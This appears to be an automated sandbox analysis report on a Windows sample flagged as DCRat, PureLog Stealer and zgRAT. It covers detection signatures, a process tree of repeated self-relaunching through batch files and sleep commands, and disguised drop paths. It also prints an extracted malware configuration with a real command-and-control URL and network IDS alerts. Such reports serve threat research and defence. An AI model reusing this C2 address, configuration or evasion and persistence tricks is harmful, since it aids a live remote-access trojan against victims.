Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KPFv8ATDx0.exe

Overview

General Information

Sample name:KPFv8ATDx0.exe
renamed because original name is a hash value
Original sample name:3ff58b353cd7e1b70eb300561e146e6c.exe
Analysis ID:1558732
MD5:3ff58b353cd7e1b70eb300561e146e6c
SHA1:d9059f5389fad25f1bf44b7332c018f806159df9
SHA256:15892ecb245a5c3aa1ab94d60ed1d034540b14623bdc6f27acfa1f0a5791ed33
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • KPFv8ATDx0.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\KPFv8ATDx0.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
    • cmd.exe (PID: 7460 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7508 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7548 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 7644 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
        • cmd.exe (PID: 7780 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JRGN3N9ZXF.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 7824 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • PING.EXE (PID: 7840 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
          • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 7996 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
            • cmd.exe (PID: 8128 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aehWhM7TGU.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 8184 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • w32tm.exe (PID: 1196 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
              • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 1412 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
                • cmd.exe (PID: 6328 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cWXsH5vMZ0.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • chcp.com (PID: 1452 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                  • PING.EXE (PID: 7076 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                  • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 3232 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
                    • cmd.exe (PID: 7452 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pFxSEGDzP3.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • chcp.com (PID: 7456 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                      • w32tm.exe (PID: 1916 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                      • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 3620 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
                        • cmd.exe (PID: 1532 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yJr0BespZg.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • chcp.com (PID: 4240 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                          • PING.EXE (PID: 3312 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                          • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 3616 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
                            • cmd.exe (PID: 4484 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bgR6NVhjy4.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                              • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                              • chcp.com (PID: 4332 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                              • w32tm.exe (PID: 5688 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                              • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 5352 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
                                • cmd.exe (PID: 7896 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bqMLTwU6O8.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                  • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                  • chcp.com (PID: 7660 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                  • PING.EXE (PID: 7684 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                                  • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 7648 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
                                    • cmd.exe (PID: 5820 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4XCyKdTKaY.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                      • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                      • chcp.com (PID: 5976 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                      • PING.EXE (PID: 348 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                                      • oqWNZWQNWoNnROlqjKcKhLM.exe (PID: 6484 cmdline: "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" MD5: 3FF58B353CD7E1B70EB300561E146E6C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://38.180.228.120/cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
KPFv8ATDx0.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    KPFv8ATDx0.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1295138767.00000000003A2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.1346120798.0000000012961000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: KPFv8ATDx0.exe PID: 7272JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: oqWNZWQNWoNnROlqjKcKhLM.exe PID: 7644JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.KPFv8ATDx0.exe.3a0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          0.0.KPFv8ATDx0.exe.3a0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                            Sigma Signatures

                            No Sigma rule has matched

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-19T18:52:22.583859+010020480951A Network Trojan was detected192.168.2.74974238.180.228.12080TCP
                            2024-11-19T18:52:35.443182+010020480951A Network Trojan was detected192.168.2.74982238.180.228.12080TCP
                            2024-11-19T18:52:46.099413+010020480951A Network Trojan was detected192.168.2.74988238.180.228.12080TCP
                            2024-11-19T18:52:59.865009+010020480951A Network Trojan was detected192.168.2.74996238.180.228.12080TCP
                            2024-11-19T18:53:10.833745+010020480951A Network Trojan was detected192.168.2.74997538.180.228.12080TCP
                            2024-11-19T18:53:23.318092+010020480951A Network Trojan was detected192.168.2.74997638.180.228.12080TCP
                            2024-11-19T18:53:33.489962+010020480951A Network Trojan was detected192.168.2.74997738.180.228.12080TCP
                            2024-11-19T18:53:46.146219+010020480951A Network Trojan was detected192.168.2.74997838.180.228.12080TCP
                            2024-11-19T18:53:59.315380+010020480951A Network Trojan was detected192.168.2.74997938.180.228.12080TCP
                            2024-11-19T18:54:09.443063+010020480951A Network Trojan was detected192.168.2.74998038.180.228.12080TCP
                            2024-11-19T18:54:20.864944+010020480951A Network Trojan was detected192.168.2.74998138.180.228.12080TCP
                            2024-11-19T18:54:30.271239+010020480951A Network Trojan was detected192.168.2.74998238.180.228.12080TCP
                            2024-11-19T18:54:41.865014+010020480951A Network Trojan was detected192.168.2.74998338.180.228.12080TCP
                            2024-11-19T18:54:51.099420+010020480951A Network Trojan was detected192.168.2.74998438.180.228.12080TCP
                            2024-11-19T18:55:02.443241+010020480951A Network Trojan was detected192.168.2.74998538.180.228.12080TCP
                            2024-11-19T18:55:14.615047+010020480951A Network Trojan was detected192.168.2.74998638.180.228.12080TCP
                            2024-11-19T18:55:24.693634+010020480951A Network Trojan was detected192.168.2.74998738.180.228.12080TCP
                            2024-11-19T18:55:35.287033+010020480951A Network Trojan was detected192.168.2.74998838.180.228.12080TCP
                            2024-11-19T18:55:46.880784+010020480951A Network Trojan was detected192.168.2.74998938.180.228.12080TCP
                            2024-11-19T18:55:58.455712+010020480951A Network Trojan was detected192.168.2.74999038.180.228.12080TCP
                            2024-11-19T18:56:08.708973+010020480951A Network Trojan was detected192.168.2.74999138.180.228.12080TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: KPFv8ATDx0.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\cWXsH5vMZ0.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\bqMLTwU6O8.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\yJr0BespZg.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\aehWhM7TGU.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\Desktop\CKTJbAfr.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                            Source: C:\Users\user\AppData\Local\Temp\TqMgut2j0M.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\JRGN3N9ZXF.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeAvira: detection malicious, Label: HEUR/AGEN.1329680
                            Source: C:\Users\user\Desktop\ACAUZvYN.logAvira: detection malicious, Label: TR/Agent.jbwuj
                            Source: C:\Users\user\AppData\Local\Temp\4XCyKdTKaY.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\bgR6NVhjy4.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\pFxSEGDzP3.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeAvira: detection malicious, Label: HEUR/AGEN.1329680
                            Source: C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeAvira: detection malicious, Label: HEUR/AGEN.1329680
                            Found malware configuration
                            Source: 00000000.00000002.1346120798.0000000012961000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://38.180.228.120/cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeReversingLabs: Detection: 71%
                            Source: C:\Program Files\Windows Defender\oqWNZWQNWoNnROlqjKcKhLM.exeReversingLabs: Detection: 71%
                            Source: C:\Program Files\Windows Multimedia Platform\oqWNZWQNWoNnROlqjKcKhLM.exeReversingLabs: Detection: 71%
                            Source: C:\Users\user\Desktop\ACAUZvYN.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\AWvLLWqc.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\CKTJbAfr.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\CyIkUInh.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\FvOMJVpt.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\GLOjgbXG.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\GxRSZgBO.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\IHWAbonb.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\KFhcUPbS.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\LWkTXfAf.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\LcQaEBDP.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\NgGUXyfg.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\NqOhhczU.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\NvmJyloG.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\ObZHJZRv.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\OgVBQDTo.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\OkvSnMWj.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\OwGrvDOt.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\PAkihvfV.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\PFIKyDTH.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\PYmimUsi.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\RyZipATO.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\SIxHSvEB.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\SeerDZBz.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\UTCgmFWk.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\UTTISNjC.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\VcGpvFqH.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\VijSQbQY.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\VxlkbjYv.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\WhRPvofH.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\XOEIXFmQ.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\XaOgexda.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\YHFyVwyQ.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\YPpRAgYW.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\YWHQgFFn.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\abhXZtjw.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\cCsjkXAC.logReversingLabs: Detection: 20%
                            Multi AV Scanner detection for submitted file
                            Source: KPFv8ATDx0.exeReversingLabs: Detection: 71%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\Desktop\BXwkEeIS.logJoe Sandbox ML: detected
                            Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\AHwNgZaF.logJoe Sandbox ML: detected
                            Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\EZPbybNn.logJoe Sandbox ML: detected
                            Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: KPFv8ATDx0.exeJoe Sandbox ML: detected
                            Source: KPFv8ATDx0.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDirectory created: C:\Program Files\Windows Multimedia Platform\oqWNZWQNWoNnROlqjKcKhLM.exeJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDirectory created: C:\Program Files\Windows Multimedia Platform\0b77faa1f189a8Jump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDirectory created: C:\Program Files\Windows Defender\oqWNZWQNWoNnROlqjKcKhLM.exeJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDirectory created: C:\Program Files\Windows Defender\0b77faa1f189a8Jump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDirectory created: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exeJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDirectory created: C:\Program Files\Internet Explorer\en-GB\0b77faa1f189a8Jump to behavior
                            Source: KPFv8ATDx0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1616486179.000000001BBA7000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1864743481.000000001BCC6000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2101207738.000000001AF7F000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2218403109.000000001B0CE000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2361787520.000000001B187000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: embly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbL source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1867465458.000000001C9A0000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: em.pdbP source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1616486179.000000001BBC9000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1616486179.000000001BBA7000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1864743481.000000001BCC6000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2101207738.000000001AF7F000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2218403109.000000001B0CE000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2361787520.000000001B187000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 4x nop then jmp 00007FFAAC561F56h0_2_00007FFAAC5513B5
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh0_2_00007FFAAC6FCDCD
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 4x nop then jmp 00007FFAAC591F56h7_2_00007FFAAC5813B5
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh7_2_00007FFAAC72CDCD
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 4x nop then jmp 00007FFAAC5C1F56h14_2_00007FFAAC5B13B5
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh14_2_00007FFAAC75CDCD
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 4x nop then jmp 00007FFAAC661F56h20_2_00007FFAAC6513B5
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh20_2_00007FFAAC7FCDCD
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 4x nop then jmp 00007FFAAC651F56h26_2_00007FFAAC6413B5
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh26_2_00007FFAAC7ECDCD
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 4x nop then jmp 00007FFAAC661F56h34_2_00007FFAAC661D4E
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh34_2_00007FFAAC7FCDCD

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49742 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49882 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49822 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49962 -> 38.180.228.120:80
